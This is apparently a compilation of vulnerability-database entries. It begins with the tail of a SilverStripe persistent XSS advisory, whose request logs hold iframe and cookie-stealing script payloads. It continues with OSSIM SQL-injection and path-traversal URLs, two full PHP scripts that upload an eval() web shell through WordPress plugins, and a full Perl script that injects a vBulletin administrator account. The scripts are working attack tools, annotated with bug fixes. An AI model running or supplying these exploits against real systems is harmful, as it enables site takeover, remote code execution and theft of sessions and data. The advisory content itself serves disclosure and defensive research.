Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; __utmb=1.8.10.1379847695; __utmc=1; __utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-ModelAdmin=false; __utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; __utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] Post Data: Title[a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C++++a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C] ParentID[] ID[] SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f] action_doSave[1] BackURL[http%3A%2F%2Fwww.example.com%2Fadmin%2Fsecurity%2FEditForm%2Ffield%2FGroups%2Fitem%2Fnew%2F] Response Headers: Server[nginx] Date[Sun, 22 Sep 2013 11:44:20 GMT] Content-Type[text/html; charset=utf-8] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-cache, max-age=0, must-revalidate] Pragma[no-cache] Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:20 GMT; path=/; httponly] X-ControllerURL[admin/security/EditForm/field/Groups/item/4] X-Pjax[CurrentForm,Breadcrumbs] X-Controller[SecurityAdmin] X-Title[SilverStripe - Sicherheit] X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen %2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? 
m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484] X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css? m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css? m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[20] Status: 200[OK] GET http://www.example.com/admin/security/EditForm/field/Groups/item/4 Load Flags[LOAD_BACKGROUND ] Content Size[3966] Mime Type[text/html] Request Headers: Host[www.example.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[*/*] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] X-Pjax[CurrentForm,Breadcrumbs] X-Requested-With[XMLHttpRequest] Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4] Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; __utmb=1.8.10.1379847695; __utmc=1; __utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-ModelAdmin=false; __utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; __utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd= organic|utmctr=(not%20provided); cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] Connection[keep-alive] Response Headers: Server[nginx] Date[Sun, 22 Sep 2013 11:44:21 GMT] 
Content-Type[text/html; charset=utf-8] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-cache, max-age=0, must-revalidate] Pragma[no-cache] Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:21 GMT; path=/; httponly] X-Controller[SecurityAdmin] X-Title[SilverStripe - Sicherheit] X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen %2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484] X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m= 1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css? m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458, /framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458,/framework/css/CheckboxSetField.css?m=1346228458] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[3966] Status: 200[OK] GET http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/ field/Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert (%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22 GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22 GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail 
%5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken <== Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[378] Mime Type[text/html] Request Headers: Host[www.example.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4] Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; __utmb=1.8.10.1379847695; __utmc=1; __utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel- collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-ModelAdmin=false; __utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; __utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] Connection[keep-alive] Response Headers: Server[nginx] Date[Sun, 22 Sep 2013 11:44:26 GMT] Content-Type[text/html; charset=utf-8] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-cache, max-age=0, must-revalidate] Pragma[no-cache] Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:26 GMT; path=/; httponly] X-Controller[SecurityAdmin] X-Title[SilverStripe - Sicherheit] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[378] Status: 200[OK] GET http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/[PERSISTENT INJECTED SCRIPT CODE AS PATH!] 
Load Flags[LOAD_DOCUMENT_URI ] Content Size[20] Mime Type[text/html] Request Headers: Host[www.example.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/ Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload %3Dalert(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22 GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22 GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmai%5D=&ID=4& SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken] Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; __utmb=1.8.10.1379847695; __utmc=1; __utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-ModelAdmin=false; __utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; __utmz=1.1379847854.1.1.utmcsr=google| utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] Connection[keep-alive] Response Headers: Server[nginx] Date[Sun, 22 Sep 2013 11:44:27 GMT] Content-Type[text/html; charset=utf-8] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] 
Cache-Control[no-cache, max-age=0, must-revalidate] Pragma[no-cache] Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:27 GMT; path=/; httponly] X-Controller[SecurityAdmin] X-Title[SilverStripe - Sicherheit] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[20] PoC: (Client-Side Link) http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/Members ?Title=a%25[PERSISTENT INJECTED SCRIPT CODE!]%3C++++a%252&ParentID=&gridfield_relationsearch=& Members%5BGridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2 C%22GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22 currentPage%22%3A1%7D%2C%22GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail %5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken Reference(s): http://ss3.demo.silverstripe.org/admin/security/show/root#Root_Roles http://ss3.demo.silverstripe.org/admin/security/EditForm/field/Groups/item/1/edit http://www.example.com/admin/security/EditForm/field/Roles/item/new http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm http://www.example.com/admin/security/EditForm/field/Groups/item/4 http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/x 1.2 The second persistent input-validation and filter-bypass vulnerability can be exploited by remote attackers holding a low-privileged application user account, with little user interaction required. To demonstrate or reproduce the issue ... 
PoC: Model Admin > Add Company > Edit Company <span class="message validation">'>"<[PERSISTENT INJECTED SCRIPT CODE!]>' ist kein numerischer Wert, nur nummerische Werte sind in diesem Feld erlaubt</span> </div> <div id="CEO" class="field text"> <label class="left" for="Form_ItemEditForm_CEO">CEO</label> <div class="middleColumn"> <input type="text" name="CEO" value=">"<[PERSISTENT INJECTED SCRIPT CODE!])</script>" class="text" id="Form_ItemEditForm_CEO" /> </div> Note: The vulnerability is located in the message validation filter exception-handling. --- PoC Session Request Logs --- Status: 200[OK] POST http://www.example.com/admin/test/Company/EditForm/field/Company/item/new/ItemEditForm Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[1309] Mime Type[text/html] Request Headers: Host[www.example.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[*/*] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Pjax[CurrentForm,Breadcrumbs] X-Requested-With[XMLHttpRequest] Referer[http://www.example.com/admin/test/Company/EditForm/field/Company/item/new?q[Name]=&q[Category]=&q[Revenue]=&q[CEO]=] Content-Length[560] Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; __utmb=1.7.10.1379847695; __utmc=1; __utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-ModelAdmin=false; __utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmb=1.5.10.1379847854; __utmc=1; __utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] Post Data: Name[Evolution+Security] Category[TEST+PP] 
Revenue[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E] <= [PERSISTENT INJECTED TEST CODES!] CEO[%3E%22%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com%3E%3Cscript+alert(document.cookie)%3C%2Fscript%3E] RelationFieldsTestPageID[] GridFieldTestPageHasOneID[] SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f] action_doSave[1] BackURL [http%3A%2F%2Fwww.example.com%2Fadmin%2Ftest%2FCompany%2FEditForm%2Ffield%2FCompany%2Fitem%2F new%3Fq%5BName%5D%3D%26q%5BCategory%5D%3D%26q%5BRevenue%5D%3D%26q%5BCEO%5D%3D%2F] Response Headers: Server[nginx] Date[Sun, 22 Sep 2013 11:20:33 GMT] Content-Type[text/html] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-cache, max-age=0, must-revalidate] Pragma[no-cache] Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:20:32 GMT; path=/; httponly] X-Controller[TestModelAdmin] X-Title[SilverStripe - Test ModelAdmin] X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen %2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? m=1379847630,/framework/admin/javascript/ModelAdmin.js?m=1346228457] X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458, /framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css? m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458, /framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[1309]
-
Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Multiple SQL Injections
source: https://www.securityfocus.com/bid/62790/info Open Source SIEM (OSSIM) is prone to multiple SQL-injection vulnerabilities. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Open Source SIEM (OSSIM) 4.3.0 and prior are vulnerable (the entry title names 3.1; the advisory text covers releases up to and including 4.3.0). The injection point is the `date_from` parameter of the RadarReport scripts below; `%Inject_Here%` marks where the SQL payload is placed. http://www.example.com/RadarReport/radar-iso27001-potential.php?date_from=%Inject_Here% http://www.example.com/RadarReport/radar-iso27001-A12IS_acquisition-pot.php?date_from=%Inject_Here%
-
WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution
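source: https://www.securityfocus.com/bid/62825/info The SEO Watcher plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability. An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
<?php
# seo-watcher ~ Exploit
# http://indonesiancoder.com/
#
# Posts a PHP file to the plugin's bundled Open Flash Chart endpoint
# (php-ofc-library/ofc_upload_image.php), which stores the raw request body
# under tmp-upload-images/<name>, then checks that the dropped file is served.
#
# NOTE(review): the dropped file is an unauthenticated eval() web shell.
# Run this only against systems you are authorised to test, pick a
# non-guessable file name, and remove the file once the test is finished.
# (The empty banner heredoc the original echoed has been dropped; it printed nothing.)

$options = getopt('u:f:');
if (!isset($options['u'], $options['f'])) {
    // Usage text corrected: the target is a WordPress site, not Joomla!.
    die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n"
      . " -u http://target.com/ The base URL of the WordPress site\n"
      . " -f shell.php The name of the file to create.\n");
}

// Normalise the base URL so a trailing slash does not yield "//" in the paths.
$base = rtrim($options['u'], '/');
$file = $options['f'];

$shell  = "{$base}/wp-content/plugins/seo-watcher/ofc/tmp-upload-images/{$file}";
$target = "{$base}/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php?name={$file}";

$payload = "<?php eval(\$_GET['cmd']); ?>";
$headers = array(
    'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
    // text/plain keeps PHP from parsing the body as form fields, so the
    // upload handler receives it as raw POST data.
    'Content-Type: text/plain',
);

echo " [+] Submitting request to: {$options['u']}\n";

$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $target);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POST, true);
curl_setopt($handle, CURLOPT_POSTFIELDS, $payload);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($handle, CURLOPT_TIMEOUT, 30);
$source = curl_exec($handle);
if ($source === false) {
    // The original ignored a failed transfer and went on to check the shell URL.
    $err = curl_error($handle);
    curl_close($handle);
    die(" [-] Request failed: {$err}\n");
}
curl_close($handle);

// This PHP notice in the response means nothing was written (presumably the
// handler reads its body from $HTTP_RAW_POST_DATA, which is unset here).
// Compare with === false: the original's bare !strpos() would treat a match
// at offset 0 as "not found".
if (strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') !== false) {
    die(" [+] Exploit was unsuccessful.\n");
}

// Verify the dropped file is reachable with a second request instead of the
// original @fopen($shell, 'r'), which depended on allow_url_fopen and never
// closed the handle it opened.
$check = curl_init();
curl_setopt($check, CURLOPT_URL, $shell);
curl_setopt($check, CURLOPT_RETURNTRANSFER, true);
curl_setopt($check, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($check, CURLOPT_TIMEOUT, 30);
curl_exec($check);
$status = curl_getinfo($check, CURLINFO_HTTP_CODE);
curl_close($check);

if ($status == 200) {
    echo " [+] Exploit completed successfully!\n";
    echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n";
} else {
    die(" [+] Exploit was unsuccessful.\n");
}
?>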
-
Alienvault Open Source SIEM (OSSIM) - 'Timestamp' Directory Traversal
source: https://www.securityfocus.com/bid/62899/info Open Source SIEM (OSSIM) is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to gain access to arbitrary system files. Information harvested may aid in launching further attacks. Open Source SIEM (OSSIM) 4.3.3 is vulnerable; other versions may also be affected. The `timestamp` parameter of `ocsreports/tele_compress.php` appears to be used as part of a filesystem path without normalisation, so `../` sequences escape the intended directory, as in: http://www.example.com/ossim/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim
-
WordPress Plugin Woopra Analytics - 'ofc_upload_image.php' Arbitrary PHP Code Execution
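source: https://www.securityfocus.com/bid/62876/info The Woopra Analytics Plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability because it fails to properly validate user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
<?php
# woopra plugins ~ Exploit
# http://indonesiancoder.com/
#
# Posts a PHP file to the plugin's bundled Open Flash Chart endpoint
# (inc/php-ofc-library/ofc_upload_image.php), which stores the raw request
# body under inc/tmp-upload-images/<name>, then checks that the dropped file
# is served.
#
# NOTE(review): the dropped file is an unauthenticated eval() web shell.
# Run this only against systems you are authorised to test, pick a
# non-guessable file name, and remove the file once the test is finished.
# (The empty banner heredoc the original echoed has been dropped; it printed nothing.)

$options = getopt('u:f:');
if (!isset($options['u'], $options['f'])) {
    // Usage text corrected: the target is a WordPress site, not Joomla!.
    die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n"
      . " -u http://target.com/ The base URL of the WordPress site\n"
      . " -f shell.php The name of the file to create.\n");
}

// Normalise the base URL; the original built the shell URL with a literal
// "//" after the host, which some servers reject or canonicalise differently.
$base = rtrim($options['u'], '/');
$file = $options['f'];

$shell  = "{$base}/wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
$target = "{$base}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";

$payload = "<?php eval(\$_GET['cmd']); ?>";
$headers = array(
    'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1',
    // text/plain keeps PHP from parsing the body as form fields, so the
    // upload handler receives it as raw POST data.
    'Content-Type: text/plain',
);

echo " [+] Submitting request to: {$options['u']}\n";

$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $target);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POST, true);
curl_setopt($handle, CURLOPT_POSTFIELDS, $payload);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($handle, CURLOPT_TIMEOUT, 30);
$source = curl_exec($handle);
if ($source === false) {
    // The original ignored a failed transfer and went on to check the shell URL.
    $err = curl_error($handle);
    curl_close($handle);
    die(" [-] Request failed: {$err}\n");
}
curl_close($handle);

// This PHP notice in the response means nothing was written (presumably the
// handler reads its body from $HTTP_RAW_POST_DATA, which is unset here).
// Compare with === false: the original's bare !strpos() would treat a match
// at offset 0 as "not found".
if (strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') !== false) {
    die(" [+] Exploit was unsuccessful.\n");
}

// Verify the dropped file is reachable with a second request instead of the
// original @fopen($shell, 'r'), which depended on allow_url_fopen and never
// closed the handle it opened.
$check = curl_init();
curl_setopt($check, CURLOPT_URL, $shell);
curl_setopt($check, CURLOPT_RETURNTRANSFER, true);
curl_setopt($check, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($check, CURLOPT_TIMEOUT, 30);
curl_exec($check);
$status = curl_getinfo($check, CURLINFO_HTTP_CODE);
curl_close($check);

if ($status == 200) {
    echo " [+] Exploit completed successfully!\n";
    echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n";
} else {
    die(" [+] Exploit was unsuccessful.\n");
}
?>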
-
vBulletin 4.1.x - '/install/upgrade.php' Security Bypass
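source: https://www.securityfocus.com/bid/62909/info vBulletin is prone to a security-bypass vulnerability. Successful exploits can allow attackers to bypass certain security restrictions and perform unauthorized actions.
#!/usr/bin/perl
#
# Title: vBulletin remote admin injection exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 17 September 2013
# Published: 24 October 2013
# MorXploit Research
# http://www.MorXploit.com
#
# Vendor: vBulletin (www.vbulletin.com)
# Version: 4.1.x / 5.x.x
# Vulnerability: Remote admin injection
# Severity: High
# Status: Confirmed
#
# Exploit code description:
# Perl code to inject a new admin account through the upgrade.php script.
#
# Vulnerability details:
# upgrade.php is vulnerable to new-admin-account injection: the script does not
# require authentication when upgrading, only the customer number, which can be
# extracted from the same script's page source.
#
# Fix:
# Rename or delete the install folder until a fix is released.
#
# Author disclaimer:
# The information contained in this entire document is for educational,
# demonstration and testing purposes only. Author cannot be held responsible
# for any malicious use. Use at your own risk.
#
# Exploit usage:
#
# root@MorXploit:/home/simo/morx# perl morxvb.pl localhost
#
# ===================================================
# --- vbulletin admin injection exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Trying to get customer number ... hold on!
# [+] Got xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!
# [*] Trying to MorXploit localhost ... hold on!
# [+] Admin account successfully injected!
# [+] Admin: MorXploit
# [+] Pass: m0rxpl017
#
# Review changes: the second socket's failure check tested $sock instead of
# $sock2; HTTP lines now end in CRLF; the POST body is sent with exactly
# Content-Length bytes (no trailing "\n\n"); sockets are closed; an absent
# customer number no longer interpolates undef into the request.

use strict;
use warnings;
use IO::Socket;

# Print the tool banner (shared by the usage path and the main path).
sub banner {
    system('clear');
    print "\n";
    print "===================================================\n";
    print "--- vbulletin admin injection exploit\n";
    print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
    print "--- MorXploit Research www.MorXploit.com\n";
    print "===================================================\n";
}

if (!defined($ARGV[0])) {
    banner();
    print "--- Usage: perl $0 target\n\n";
    exit;
}

my $site = $ARGV[0];

##### Change these as needed #####
# NOTE(review): these are the credentials the injected administrator account
# receives; the defaults are published with this exploit, so change them.
my $user   = "MorXploit";
my $passwd = "m0rxpl017";
my $email  = "dev%40null.com";
my $path   = "/install/upgrade.php";
##################################

my $accept = "Accept: */*";
my $ct     = "application/x-www-form-urlencoded";
my $port   = "80";

# Open a plain TCP connection to $site:$port (HTTP only; no TLS support).
# Dies if the connection cannot be established.
sub connect_to {
    my $sock = IO::Socket::INET->new(
        PeerAddr => $site,
        PeerPort => $port,
        Proto    => "tcp",
    );
    die "\n[-] Can't creat socket: $!\n" unless $sock;
    return $sock;
}

banner();

# Step 1: fetch upgrade.php and scrape the customer number from its source.
print "[*] Trying to get customer number ... hold on!\n";
my $sock = connect_to();
print $sock "GET $path HTTP/1.1\r\n";
print $sock "Host: $site\r\n";
print $sock "$accept\r\n";
print $sock "Content-Type: $ct\r\n";
print $sock "Connection: Close\r\n\r\n";

my $gotcn;
while (my $cn = <$sock>) {
    if ($cn =~ /CUSTNUMBER = \"(.*?)\"/) {
        $gotcn = $1;
    }
}
close($sock);

if (!defined $gotcn) {
    print "[-] Failed to get customer number! Nulled? Going to try anyway!\n";
    $gotcn = '';    # keep the request well-formed instead of interpolating undef
} else {
    print "[+] Got $gotcn!\n";
}

# Step 2: drive the installer's administrator-creation step (step=7) directly,
# presenting the scraped customer number both in the body and as a cookie.
my $xploit = join('&',
    "ajax=1", "version=install", "checktable=false", "firstrun=false",
    "step=7", "startat=0", "only=false", "customerid=$gotcn",
    "options[skiptemplatemerge]=0", "response=yes", "htmlsubmit=1",
    "htmldata[username]=$user", "htmldata[password]=$passwd",
    "htmldata[confirmpassword]=$passwd", "htmldata[email]=$email",
);
my $cl = length($xploit);

my $sock2 = connect_to();
print "[*] Trying to MorXploit $site ... hold on!\n";
print $sock2 "POST $path HTTP/1.1\r\n";
print $sock2 "Host: $site\r\n";
print $sock2 "$accept\r\n";
print $sock2 "Cookie: bbcustomerid=$gotcn\r\n";
print $sock2 "Content-Length: $cl\r\n";
print $sock2 "Content-Type: $ct\r\n";
print $sock2 "Connection: Close\r\n\r\n";
print $sock2 $xploit;    # exactly $cl bytes, matching Content-Length

while (my $result = <$sock2>) {
    if ($result =~ /Administrator account created/) {
        print "[+] Admin account successfully injected!\n";
        print "[+] Admin: $user\n";
        print "[+] Pass: $passwd\n";
        close($sock2);
        exit;
    }
}
close($sock2);
print "[-] Failed, something went wrong\n";
exit;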